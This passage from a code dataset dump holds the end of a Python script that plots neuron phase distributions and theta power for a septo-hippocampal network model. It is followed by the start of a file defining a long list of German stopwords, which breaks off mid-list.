color=neurons_colors[\"olm\"])\n axs[2].set_xlim(-2*np.pi, 2*np.pi)\n axs[2].set_title('OLM')\n \n fig.tight_layout()\n fig.savefig(saving_path + \"ms_cs_pp_phase_shift.png\", dpi=500)\n\n \n theta_part_mean = np.zeros(30, dtype=float)\n theta_part_std = np.zeros(30, dtype=float)\n for idx, t in enumerate(theta_part):\n theta_part_mean[idx] = np.mean(t)\n theta_part_std[idx] = np.std(t)\n fig, axs = plt.subplots()\n fig.set_size_inches(10, 5)\n axs.errorbar(phase_shift, theta_part_mean, yerr=theta_part_std, fmt='o')\n \n \n fig.savefig(saving_path + \"ms_cs_pp_phase_shift_theta_power.png\", dpi=500)\n \n \ndef without_of_each_input_processing(processed_data, control_data, saving_path):\n \n neurons_colors = get_colors()\n \n without_pv1_pyr = np.array([], dtype=float)\n without_pv1_bas = np.array([], dtype=float)\n without_pv1_olm = np.array([], dtype=float)\n \n without_pv2_pyr = np.array([], dtype=float)\n without_pv2_bas = np.array([], dtype=float)\n without_pv2_olm = np.array([], dtype=float)\n \n without_pp_pyr = np.array([], dtype=float)\n without_pp_bas = np.array([], dtype=float)\n without_pp_olm = np.array([], dtype=float)\n \n without_cs_pyr = np.array([], dtype=float)\n without_cs_bas = np.array([], dtype=float)\n without_cs_olm = np.array([], dtype=float)\n \n without_ms_pyr = np.array([], dtype=float)\n without_ms_bas = np.array([], dtype=float)\n without_ms_olm = np.array([], dtype=float)\n \n without_ex_pyr = np.array([], dtype=float)\n without_ex_bas = np.array([], dtype=float)\n without_ex_olm = np.array([], dtype=float)\n \n theta_part = np.array([], dtype=float)\n \n for data_value in control_data:\n theta_part = np.append( theta_part, data_value[\"theta_part\"] )\n \n for idx, data_value in enumerate(processed_data):\n theta_part = np.append( theta_part, data_value[\"theta_part\"] )\n \n \n if (idx//10 == 0):\n without_pv1_pyr = np.append(without_pv1_pyr, data_value[\"pyramide\"])\n without_pv1_bas = np.append(without_pv1_bas, data_value[\"basket\"])\n without_pv1_olm = np.append(without_pv1_olm, data_value[\"olm\"])\n \n \n \n if (idx//10 == 1):\n without_pv2_pyr = np.append(without_pv2_pyr, data_value[\"pyramide\"])\n without_pv2_bas = np.append(without_pv2_bas, data_value[\"basket\"])\n without_pv2_olm = np.append(without_pv2_olm, data_value[\"olm\"])\n \n \n if (idx//10 == 2):\n without_pp_pyr = np.append(without_pp_pyr, data_value[\"pyramide\"])\n without_pp_bas = np.append(without_pp_bas, data_value[\"basket\"])\n without_pp_olm = np.append(without_pp_olm, data_value[\"olm\"])\n\n \n if (idx//10 == 3):\n without_cs_pyr = np.append(without_cs_pyr, data_value[\"pyramide\"])\n without_cs_bas = np.append(without_cs_bas, data_value[\"basket\"])\n without_cs_olm = np.append(without_cs_olm, data_value[\"olm\"])\n \n \n if (idx//10 == 4):\n without_ms_pyr = np.append(without_ms_pyr, data_value[\"pyramide\"])\n without_ms_bas = np.append(without_ms_bas, data_value[\"basket\"])\n without_ms_olm = np.append(without_ms_olm, data_value[\"olm\"])\n \n if (idx//10 == 5):\n without_ex_pyr = np.append(without_ex_pyr, data_value[\"pyramide\"])\n without_ex_bas = np.append(without_ex_bas, data_value[\"basket\"])\n without_ex_olm = np.append(without_ex_olm, data_value[\"olm\"]) \n \n \n \n without_pv1_pyr = np.append(without_pv1_pyr, without_pv1_pyr + 2*np.pi)\n without_pv1_bas = np.append(without_pv1_bas, without_pv1_bas + 2*np.pi)\n without_pv1_olm = np.append(without_pv1_olm, without_pv1_olm + 2*np.pi)\n \n without_pv2_pyr = np.append(without_pv2_pyr, without_pv2_pyr + 2*np.pi)\n without_pv2_bas = np.append(without_pv2_bas, without_pv2_bas + 2*np.pi)\n without_pv2_olm = np.append(without_pv2_olm, without_pv2_olm + 2*np.pi)\n \n without_pp_pyr = np.append(without_pp_pyr, without_pp_pyr + 2*np.pi)\n without_pp_bas = np.append(without_pp_bas, without_pp_bas + 2*np.pi)\n without_pp_olm = np.append(without_pp_olm, without_pp_olm + 2*np.pi)\n \n without_cs_pyr = np.append(without_cs_pyr, without_cs_pyr + 2*np.pi)\n without_cs_bas = np.append(without_cs_bas, without_cs_bas + 2*np.pi)\n without_cs_olm = np.append(without_cs_olm, without_cs_olm + 2*np.pi)\n \n without_ms_pyr = np.append(without_ms_pyr, without_ms_pyr + 2*np.pi)\n without_ms_bas = np.append(without_ms_bas, without_ms_bas + 2*np.pi)\n without_ms_olm = np.append(without_ms_olm, without_ms_olm + 2*np.pi) \n \n without_ex_pyr = np.append(without_ex_pyr, without_ex_pyr + 2*np.pi)\n without_ex_bas = np.append(without_ex_bas, without_ex_bas + 2*np.pi)\n without_ex_olm = np.append(without_ex_olm, without_ex_olm + 2*np.pi) \n \n \n \n \n fig, axs = plt.subplots(nrows=3, ncols=6, figsize=(20, 10), tight_layout=True, sharex=True, sharey=True)\n axs[0, 0].hist(without_pv1_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 0].hist(without_pv1_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 0].hist(without_pv1_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n axs[0, 1].hist(without_pv2_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 1].hist(without_pv2_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 1].hist(without_pv2_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n axs[0, 2].hist(without_pp_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 2].hist(without_pp_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 2].hist(without_pp_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n\n axs[0, 3].hist(without_cs_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 3].hist(without_cs_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 3].hist(without_cs_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n \n axs[0, 4].hist(without_ms_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 4].hist(without_ms_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 4].hist(without_ms_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n axs[0, 5].hist(without_ex_pyr, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"pyr\"])\n axs[1, 5].hist(without_ex_bas, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"bas\"])\n axs[2, 5].hist(without_ex_olm, bins=40, normed=True, alpha=0.75, color=neurons_colors[\"olm\"])\n \n \n \n phases = np.linspace(-np.pi, 3*np.pi, 200)\n signal = 0.25 * (np.cos(phases) + 1)\n \n for idx in range(3):\n for ax in axs[idx]:\n ax.plot(phases, signal, color=\"black\", linewidth=2)\n ax.set_xlim(-np.pi, 3*np.pi)\n ax.set_ylim(0, 0.5)\n ax.xaxis.set_tick_params(labelsize=36)\n ax.yaxis.set_tick_params(labelsize=36)\n fig.savefig(saving_path + \"without_any_inputs.png\", dpi=500)\n \n \n \n theta_part = theta_part.reshape(7, 10).T\n fig = plt.figure()\n plt.boxplot(theta_part, sym=\"\")\n # plt.ylim(0, 0.2)\n fig.savefig(saving_path + \"without_any_inputs_theta_power.png\", dpi=500)\n \n\ndef pv1_pv2_phase_shift(processed_data, saving_path):\n \n pyr_2_15 = np.array([], dtype=float)\n bas_2_15 = np.array([], dtype=float)\n olm_2_15 = np.array([], dtype=float)\n\n pyr_pi = np.array([], dtype=float)\n bas_pi = np.array([], dtype=float)\n olm_pi = np.array([], dtype=float)\n\n for idx, data in enumerate(processed_data):\n if idx < 5:\n pyr_2_15 = np.append(pyr_2_15, data[\"pyramide\"])\n bas_2_15 = np.append(bas_2_15, data[\"basket\"])\n olm_2_15 = np.append(olm_2_15, data[\"olm\"])\n else:\n pyr_pi = np.append(pyr_pi, data[\"pyramide\"])\n bas_pi = np.append(bas_pi, data[\"basket\"])\n olm_pi = np.append(olm_pi, data[\"olm\"])\n \n pyr_2_15 = np.append(pyr_2_15, pyr_2_15 + 2*np.pi)\n bas_2_15 = np.append(bas_2_15, bas_2_15 + 2*np.pi)\n olm_2_15 = np.append(olm_2_15, olm_2_15 + 2*np.pi)\n \n pyr_pi = np.append(pyr_pi, pyr_pi + 2*np.pi)\n bas_pi = np.append(bas_pi, bas_pi + 2*np.pi)\n olm_pi = np.append(olm_pi, olm_pi + 2*np.pi) \n \n \n \n fig, axs = plt.subplots(nrows=3, ncols=2, sharex=True)\n axs[0, 0].hist(pyr_2_15, bins=40, normed=True, alpha=0.75)\n axs[1, 0].hist(bas_2_15, bins=40, normed=True, alpha=0.75)\n axs[2, 0].hist(olm_2_15, bins=40, normed=True, alpha=0.75)\n \n axs[0, 1].hist(pyr_pi, bins=40, normed=True, alpha=0.75)\n axs[1, 1].hist(bas_pi, bins=40, normed=True, alpha=0.75)\n axs[2, 1].hist(olm_pi, bins=40, normed=True, alpha=0.75)\n \n \n phases = np.linspace(-np.pi, 3*np.pi, 200)\n signal = 0.25 * (np.cos(phases) + 1)\n \n for idx in range(3):\n for ax in axs[idx]:\n ax.plot(phases, signal, linewidth=2)\n ax.set_xlim(-np.pi, 3*np.pi)\n ax.set_ylim(0, 0.5)\n\n \n fig.tight_layout()\n fig.savefig(saving_path + \"pv1-pv2_phase_shift.png\", dpi=500)\n \n\ndef balance_cs_bas2pyr(processed_data, saving_path):\n \n number_synapses = np.arange(0, 110, 10, dtype=int)\n \n data_mean_pyr = []\n data_varience_pyr = []\n \n data_mean_bas = []\n data_varience_bas = []\n\n data_mean_olm = []\n data_varience_olm = []\n \n theta_part = []\n \n pyr_tmp = np.array([], dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n for idx, data_value in enumerate(processed_data):\n \n \n pyr_tmp = np.append(pyr_tmp, data_value[\"pyramide\"])\n bas_tmp = np.append(bas_tmp, data_value[\"basket\"])\n olm_tmp = np.append(olm_tmp, data_value[\"olm\"])\n theta_tmp = np.append(theta_tmp, data_value[\"theta_part\"])\n \n \n if ( (idx+1)%10 == 0 ):\n \n \n data_mean_pyr.append( circmean(pyr_tmp, high=np.pi, low=-np.pi) )\n data_varience_pyr.append( circstd(pyr_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_bas.append( circmean(bas_tmp, high=np.pi, low=-np.pi) )\n data_varience_bas.append( circstd(bas_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_olm.append( circmean(olm_tmp, high=np.pi, low=-np.pi) )\n data_varience_olm.append( circstd(olm_tmp, high=np.pi, low=-np.pi) )\n \n theta_part.append(theta_tmp)\n \n pyr_tmp = np.array([], dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n colors = get_colors()\n phases = np.linspace(-2*np.pi, 2*np.pi, 100)\n wave = np.median(number_synapses) + 20 * np.cos(phases)\n fig, axs = plt.subplots(nrows=1, ncols=3, sharey=True)\n \n axs[0].errorbar(data_mean_pyr, number_synapses, xerr=data_varience_pyr, fmt='o', color=colors[\"pyr\"])\n axs[0].set_title('Pyr')\n \n axs[1].errorbar(data_mean_bas, number_synapses, xerr=data_varience_bas, fmt='o', color=colors[\"bas\"])\n axs[1].set_title('Bas')\n \n axs[2].errorbar(data_mean_olm, number_synapses, xerr=data_varience_olm, fmt='o', color=colors[\"olm\"])\n axs[2].set_title('OLM')\n \n for ax in axs:\n # ax.set_xlim(-np.pi, 3*np.pi)\n ax.plot(phases, wave, color=\"black\", linewidth=2)\n ax.set_xlim(-2*np.pi, 2*np.pi)\n \n fig.tight_layout()\n fig.savefig(saving_path + \".png\", dpi=500)\n \n \n theta_part_mean = np.zeros(number_synapses.size)\n theta_part_std = np.zeros(number_synapses.size)\n \n for idx, t in enumerate(theta_part):\n theta_part_mean[idx] = np.mean(t)\n theta_part_std[idx] = np.std(t)\n \n \n fig, axs = plt.subplots()\n \n axs.errorbar(number_synapses, theta_part_mean, yerr=theta_part_std, fmt='o')\n # axs.set_ylim(0, 0.3)\n axs.set_title('Relative theta power')\n \n fig.savefig(saving_path + \"_theta_part.png\", dpi=500)\n \n\ndef tonic_currents(processed_data, saving_path):\n tonic_carrents = np.linspace(-2, 1, 7)\n\n data_mean_pyr = []\n data_varience_pyr = []\n \n data_mean_bas = []\n data_varience_bas = []\n\n data_mean_olm = []\n data_varience_olm = []\n \n theta_part = []\n \n pyr_tmp = np.array([], dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n for idx, data_value in enumerate(processed_data):\n \n \n pyr_tmp = np.append(pyr_tmp, data_value[\"pyramide\"])\n bas_tmp = np.append(bas_tmp, data_value[\"basket\"])\n olm_tmp = np.append(olm_tmp, data_value[\"olm\"])\n theta_tmp = np.append(theta_tmp, data_value[\"theta_part\"])\n \n \n if ( (idx+1)%10 == 0 ):\n \n \n data_mean_pyr.append( circmean(pyr_tmp, high=np.pi, low=-np.pi) )\n data_varience_pyr.append( circstd(pyr_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_bas.append( circmean(bas_tmp, high=np.pi, low=-np.pi) )\n data_varience_bas.append( circstd(bas_tmp, high=np.pi, low=-np.pi) )\n \n data_mean_olm.append( circmean(olm_tmp, high=np.pi, low=-np.pi) )\n data_varience_olm.append( circstd(olm_tmp, high=np.pi, low=-np.pi) )\n \n theta_part.append(theta_tmp)\n \n pyr_tmp = np.array([], dtype=float)\n bas_tmp = np.array([], dtype=float)\n olm_tmp = np.array([], dtype=float)\n theta_tmp = np.array([], dtype=float)\n \n colors = get_colors()\n phases = np.linspace(-2*np.pi, 2*np.pi, 100)\n wave = np.median(tonic_carrents) + np.cos(phases)\n fig, axs = plt.subplots(nrows=1, ncols=3, sharey=True)\n \n axs[0].errorbar(data_mean_pyr, tonic_carrents, xerr=data_varience_pyr, fmt='o', color=colors[\"pyr\"])\n axs[0].set_title('Pyr')\n \n axs[1].errorbar(data_mean_bas, tonic_carrents, xerr=data_varience_bas, fmt='o', color=colors[\"bas\"])\n axs[1].set_title('Bas')\n \n axs[2].errorbar(data_mean_olm, tonic_carrents, xerr=data_varience_olm, fmt='o', color=colors[\"olm\"])\n axs[2].set_title('OLM')\n \n for ax in axs:\n # ax.set_xlim(-np.pi, 3*np.pi)\n ax.plot(phases, wave, color=\"black\", linewidth=2)\n ax.set_xlim(-2*np.pi, 2*np.pi)\n \n fig.tight_layout()\n fig.savefig(saving_path + \".png\", dpi=500)\n \n \n theta_part_mean = np.zeros(tonic_carrents.size)\n theta_part_std = np.zeros(tonic_carrents.size)\n \n for idx, t in enumerate(theta_part):\n theta_part_mean[idx] = np.mean(t)\n theta_part_std[idx] = np.std(t)\n \n \n fig, axs = plt.subplots()\n \n axs.errorbar(tonic_carrents, theta_part_mean, yerr=theta_part_std, fmt='o')\n axs.set_ylim(0, 0.2)\n axs.set_title('Relative theta power')\n \n fig.savefig(saving_path + \"_theta_part.png\", dpi=500) \n \n return None\n\n####################################\ndef plot_whole_phase_distribution(processed_data, saving_path):\n\n \n pyr = np.array([], dtype=float)\n bas = np.array([], dtype=float)\n olm = np.array([], dtype=float)\n \n for idx, data_value in enumerate(processed_data):\n \n pyr = np.append(pyr, data_value[\"pyramide\"])\n bas = np.append(bas, data_value[\"basket\"])\n olm = np.append(olm, data_value[\"olm\"])\n\n pyr = np.append(pyr, pyr + 2*np.pi )\n bas = np.append(bas, bas + 2*np.pi )\n olm = np.append(olm, olm + 2*np.pi )\n neurons_colors = get_colors()\n\n phases_x = np.linspace(-np.pi, 3*np.pi, 40)\n phases_y = 0.75*0.5*( np.cos(phases_x) + 1.0)\n plt.figure( tight_layout=True )\n plt.subplot(311)\n plt.hist(pyr, 40, normed=True, facecolor=neurons_colors[\"pyr\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.ylim(0, 0.75)\n plt.subplot(312)\n plt.hist(bas, 40, normed=True, facecolor=neurons_colors[\"bas\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.ylim(0, 0.75)\n plt.subplot(313)\n plt.hist(olm, 40, normed=True, facecolor=neurons_colors[\"olm\"], alpha=0.75)\n plt.plot(phases_x, phases_y, color=\"black\")\n plt.xlim(-np.pi, 3*np.pi)\n plt.ylim(0, 0.75)\n plt.tight_layout()\n plt.savefig(saving_path + \"phase_disribution_histogram.png\", dpi = 500)\n\ndef plot_theta_part(data, path):\n new_data = []\n \n \n \n for d in data:\n \n theta_part_tmp = np.array([], dtype=float)\n \n for t in d:\n theta_part_tmp = np.append(theta_part_tmp, t[\"theta_part\"])\n \n new_data.append(theta_part_tmp)\n \n \n \n plt.figure()\n plt.boxplot(new_data, sym=\"\")\n plt.tight_layout()\n plt.savefig(path + \"theta_part.png\", dpi = 500)\n \n \n \ndef keySorter(item):\n try:\n key = int(item[0:3])\n except ValueError:\n try:\n key = int(item[0:2])\n except ValueError:\n try:\n key = int(item[0])\n except ValueError:\n key = 0\n \n return key\n\n\n\nseptumInModel = False\nmain_path = \"/home/ivan/Data/modeling_septo_hippocampal_model/hippocampal_model/\" \n\n\"\"\"\n\npath = main_path + \"basic_model_test/\"\n\n\ncontrol_data = []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n\n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n control_data.append( ret )\n# plot_whole_phase_distribution(control_data, main_path)\n\"\"\"\n\n\n\n\n\"\"\"\npath = main_path + \"without_of_each_input/\" # \"basic_model_high_pp/\"\n\n\nhigh_pp = []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n \n \n tmp = file[0:2]\n try:\n tmp_int = int (tmp)\n except ValueError:\n try:\n tmp_int = int (tmp[0])\n except ValueError:\n continue\n \n if not(tmp_int >= 1 and tmp_int <= 10):\n continue\n \n \n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n high_pp.append( ret )\n\nplot_whole_phase_distribution(high_pp, main_path + \"(-ms1)_\")\n\n\npath = main_path + \"without_of_each_input/\"\n\n\nlow_cs = []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n tmp = file[0:2]\n try:\n tmp_int = int (tmp)\n except ValueError:\n continue\n # if (file != '51__all_results.npy'):continue\n if not(tmp_int >= 11 and tmp_int <= 20):\n continue\n\n\n\n\n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n low_cs.append( ret )\n#\nplot_whole_phase_distribution(low_cs, main_path + \"(-ms2)_\")\n#data = [control_data, high_pp, low_cs]\n#\n#plot_theta_part(data, main_path)\n\n\n\n\npath = main_path + \"without_of_each_input/\"\n\n\nlow_ms = []\n\n\nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n tmp = file[0:2]\n try:\n tmp_int = int (tmp)\n except ValueError:\n try:\n tmp_int = int (tmp[0])\n except ValueError:\n continue\n # if (file != '51__all_results.npy'):continue\n if not(tmp_int >= 41 and tmp_int <= 49):\n continue\n\n\n\n\n print (file)\n \n ret = make_figures(path, file, septumInModel)\n #ret = make_calculation(path, file)\n low_ms.append( ret )\n\nplot_whole_phase_distribution(low_ms, main_path + \"(-ms1and2)_\")\ndata = [control_data, high_pp, low_cs, low_ms]\n\nplot_theta_part(data, main_path)\n\"\"\"\n\n\n\nprocessed_data = []\n\n# path = main_path + \"ms_cs_pp_phase_shift2/\"\n# path = main_path + \"without_of_each_input/\"\n# path = main_path + \"no_rhythm_in_each_input(same frequency of random)/\" # \"no_rhythm_in_each_input/\"\n# path = main_path + \"ms_pv1_pv2_phase_shift/\"\n# path = main_path + \"bas_inputs_density/\"\n# path = main_path + \"olm_inputs_density/\"\n\n# path = main_path + \"bas_tonic_current/\"\npath = main_path + \"olm_tonic_current/\"\n# path = main_path + \"pyramide_dendrite_tonic_current/\"\n# path = main_path + \"pyramide_soma_tonic_current/\"\n \n \nfor file in sorted( os.listdir(path), key = keySorter ):\n if os.path.splitext(file)[1] != \".npy\":\n continue\n # if (file != '33__all_results.npy'):continue\n print (file)\n \n # ret = make_figures(path, file, septumInModel)\n ret = make_calculation(path, file)\n processed_data.append( ret )\n \n\n\n#ms_cs_pp_phase_shift_processing(processed_data, main_path)\n# without_of_each_input_processing(processed_data, control_data, main_path)\n# without_of_each_input_processing(processed_data, control_data, main_path+\"no_rhythms_same_frequency_\")\n# pv1_pv2_phase_shift(processed_data, main_path)\n# balance_cs_bas2pyr(processed_data, main_path + \"bas_inputs_density\")\n# balance_cs_bas2pyr(processed_data, main_path + \"olm_inputs_density\")\n\n# tonic_currents(processed_data, main_path + \"bas_tonic_current\")\ntonic_currents(processed_data, main_path + \"olm_tonic_current\")\n# tonic_currents(processed_data, main_path + \"pyr_dendrite_tonic_current\")\n# tonic_currents(processed_data, main_path + \"pyr_soma_tonic_current\")\n\n\n","repo_name":"ivanmysin/septo-hippocampal-model","sub_path":"cython_code/lfp_processing.py","file_name":"lfp_processing.py","file_ext":"py","file_size_in_byte":46529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33738517217","text":"import string\nimport operator\n\nSTOPWORDS = {'der', 'die', 'das', 'aus', 'in', 'eine', 'und', 'ich', 'sein', 'nach', 'ein', 'wie', 'zu', 'ihr',\n 'von', 'um', 'haben', 'aber', 'werden', 'so', 'mit', 'jahr', 'an', 'nur', 'noch', 'auf', 'über', 'sich',\n 'wir', 'für', 'viel', 'nicht', 'man', 'es', 'oder', 'sie', 'vor', 'er', 'müssen', 'auch', 'all', 'als',\n 'sollen', 'bei', 'kein', 'dies', 'bis', 'dass', 'sagen', 'können', 'wollen', 'jahr', 'neu', 'werden',\n 'land', 'machen', 'uhr', 'haben', 'alt', 'gehen', 'prozent', 'gross', 'sein', 'hoch', 'stehen',\n 'können', 'ende', 'jung', 'lassen', 'viel', 'müssen', 'nahe', 'sehen', 'sollen', 'finden', 'gut',\n 'sagen', 'seite', 'lang', 'bleiben', 'weit', 'geben', 'vergangen', 'liegen', 'klein', 'kommen', 'leben',\n 'wenig', 'dürfen', 'eigen', 'wollen', 'ganz', 'stellen', 'haben', 'lang', 'machen', 'klein', 'sein',\n 'jung', 'geben', 'hand', 'werden', 'blick', 'weit', 'auge', 'gut', 'den', 'ist', 'des', 'im', 'dem',\n 'hat', 'sind', 'sei', 'war', 'einem', 'wird', 'wenn', 'sagt', 'am', 'einer', 'einen', 'mehr', 'zum',\n 'diese', 'gegen', 'habe', 'zur', 'sagte', 'hatte', 'nun', 'keine', 'unter', 'seit', 'damit', 'seien',\n 'will', 'soll', 'kann', 'wurde', 'ihre', 'vom', 'bereits', 'gibt', 'jedoch', 'weiterhin', 'wegen',\n 'geht', 'hätten', 'allerdings', '', 'derselben', 'allen', 'ja', 'eben', 'wieder', 'ersten', 'einiges', 'ins', 'offen', 'welche',\n 'hattest', 'ohne', 'zu', 'ihrem', 'weiteres', 'jenem', 'darin', 'anders', 'richtig', 'na', 'u', 'wahr?',\n 'viel', 'sechste', 'rund', 'fünfte', 'zwölf', 'gott', 'geschweige', 'bei', 'gut', 'durften', 'sowie',\n 'ging', 'grosses', 'manchem', 'dritten', 'jener', 'und?', 'lang', 'einmal', 'machte', 'wenn', 'meiner',\n 'ganze', 'vielleicht', 'unsen', 'diesen', 'etwa', 'wäre', 'hinter', 'los', 'zweite', 'ganzes', 'solche',\n 'manchen', 'soll', 'wenigstens', 'zwischen', 'erste', 'solang', 'wollten', 'endlich', 'zwei', 'jetzt',\n 'außer', 'dieselben', 'demgemäss', 'etwas', 'davon', 'können', 'bekannt', 'gehen', 'ausserdem', 'mussten',\n 'danach', 'sollst', 'grosser', 'der', 'gute', 'wessen', 'auch', 'ach', 'uhr', 'daran', 'daneben', 'kann',\n 'dem', 'seinem', 'alles', 'jemanden', 'zum', 'mag', 'c', 'solchen', 'l', 'solchem', 'ihr', 'sind', 'achte',\n 'gedurft', 'worden', 'deines', 'könnt', 'trotzdem', 'rechte', 'werden', 'zwanzig', 'besser', 'gehabt',\n 'wirklich', 'diejenigen', 'jeden', 'keines', 'neue', 'nicht', 'währenddessen', 'konnten', 'kommen',\n 'seien', 'unse', 'darauf', 'ab', 'ganzer', 'dessen', 'sie', 'muß', 'meinem', 'neun', 'müßt', 'anderer',\n 'sechs', 'vor', 'dürft', 'wie', 'nie', 'a', 'zugleich', 'zehnter', 'd', 'einem', 'er', 'will', 'i',\n 'denselben', 'für', 'darfst', 'steht', 'großer', 'meines', 'siebentes', 'damals', 'dieser', 'gross',\n 'würden', 'wer', 'zehnten', 'weg', 'acht', 'gar', 'warst', 'b', 'achter', 'jedem', 'bin', 'früher',\n 'dementsprechend', 'damit', 'großen', 'es', 'q', 'später', 'niemandem', 'achten', 'besonders', 'eigenen',\n 'natürlich', 'übrigens', 'zeit', 'dies', 'andern', 'aus', 'ei,', 'ihres', 'seiner', 'euren', 'eine', 'hin',\n 'ob', 'dein', 'was', 'eurem', 'wurde', 'haben', 'schluss', 'erster', 'dir', 'j', 'eigenes', 'und', 'sei',\n 'fünf', 'außerdem', 'soweit', 'entweder', 'seit', 'seine', 'r', 'sieben', 'über', 'mögt', 'zehn',\n 'einigem', 'ordnung', 'indem', 'solcher', 'tage', 'vierten', 'große', 'hätte', 'habt', 'dort', 'her',\n 'unter', 'mir', 'daher', 'wird', 'meinen', 'darunter', 'in', 'dazu', 'macht', 'dahin', 'vergangenen',\n 'dermassen', 'seines', 'wenige', 'heisst', 'ei', 'welcher', 'demzufolge', 'jedermanns', 'konnte',\n 'weniges', 'allerdings', 'demselben', 'wollt', 'hab', 'viertes', 'dann', 'kaum', 'derjenige', 'gutes',\n 'deinen', 'eurer', 'zuerst', 'd.h', 'sagte', 'derer', 'kurz', 'niemand', 'zweiten', 'wurden', 'ich',\n 'unserer', 'dich', 'dafür', 'neunter', 'meine', 'wieso', 'ebenso', 'mußt', 'werde', 'startseite', 'den',\n 'tag', 'sich', 'gegenüber', 'bald', 'schlecht', 'sehr', 'z.b', 'je', 'n', 'derjenigen', 'muss', 'manches',\n 'musst', 'das', 'x', 'gewesen', 'ein', 'unses', 'gemacht', 'p', 'jahr', 'seinen', 'unsere', 'dahinter',\n 'auf', 'sollte', 'du', 'alle', 'fünfter', 'beide', 'die', 'währenddem', 'eure', 'jemand', 'jedes',\n 'magst', 'morgen', 'anderem', 's', 'o', 'hier', 'mann', 'viele', 'wegen', 'gern', 'davor', 'grosse',\n 'solches', 'jede', 'sollten', 'sollt', 'ganz', 'diesem', 'mal', 'aller', 'erstes', 'gleich', 'zehntes',\n 'dadurch', 'so', 'siebente', 'einander', 'welchem', 'oft', 'nach', 'wir', 'mein', 'nein', 'gegen', 'dass',\n 'bist', 'zweites', 'möglich', 'derselbe', 'weiteren', 'schon', 'überhaupt', 'dagegen', 'seid', 'w', 'war',\n 'ende', 'jeder', 'andere', 'gab', 'uns', 'gewollt', 'waren', 'welchen', 'infolgedessen', 'durfte', 'woher',\n 'wollte', 'ihnen', 'gekannt', 'irgend', 'drei', 'jemandem', 'y', 'mit', 'darum', 'jenes', 'seitdem',\n 'mittel', 'fünftes', 'nachdem', 'erst', 'allem', 'siebenter', 'neuntes', 'durchaus', 'mehr', 'keiner',\n 'euch', 'tritt', 'niemanden', 'zehnte', 'demgemäß', 'dank', 'vierte', 'sache', 'hast', 'vielen', 'unser',\n 'einer', 'zwar', 'dazwischen', 'zusammen', 'habe', 'ihn', 'dasselbe', 'dasein', 'wollen', 'eigene',\n 'einigen', 'ernst', 'unsem', 'ihrer', 'oder', 'deren', 'ag', 'beim', 'wohl', 'mensch', 'vom', 'könnte',\n 'hoch', 'gerade', 'vielem', 'hätten', 'tun', 'jene', 'dieselbe', 't', 'machen', 'wirst', 'jenen',\n 'keine', 'neuen', 'weil', 'oben', 'f', 'daraus', 'mahn', 'deine', 'jahren', 'sagt', 'während', 'z',\n 'drittes', 'vier', 'ihre', 'wen', 'wohin', 'mögen', 'wissen', 'einiger', 'besten', 'darf', 'einen',\n 'geworden', 'tel', 'keinem', 'eigener', 'denn', 'mochten', 'darüber', 'wann', 'dabei', 'neunten', 'man',\n 'also', 'anderen', 'nahm', 'drin', 'keinen', 'wart', 'willst', 'hatte', 'rechten', 'neunte', 'diese',\n 'ander', 'au', 'ist', 'dürfen', 'zur', 'demgegenüber', 'bereits', 'lieber', 'gemocht', 'selbst', 'kleinen',\n 'wem', 'tat', 'weitere', 'würde', 'recht', 'deshalb', 'da', 'hattet', 'mich', 'gibt', 'deiner', 'immer',\n 'ihren', 'aber', 'teil', 'kleiner', 'werdet', 'deswegen', 'dieses', 'menschen', 'kein', 'hat', 'sa',\n 'deinem', 'großes', 'von', 'anderes', 'ehrlich', 'anderm', 'weniger', 'rechter', 'suche', 'allein',\n 'zunächst', 'grossen', 'einig', 'sechstes', 'jedermann', 'an', 'statt', 'ihm', 'rechtes', 'möchte',\n 'hatten', 'ausser', 'heute', 'daselbst', 'euer', 'beiden', 'musste', 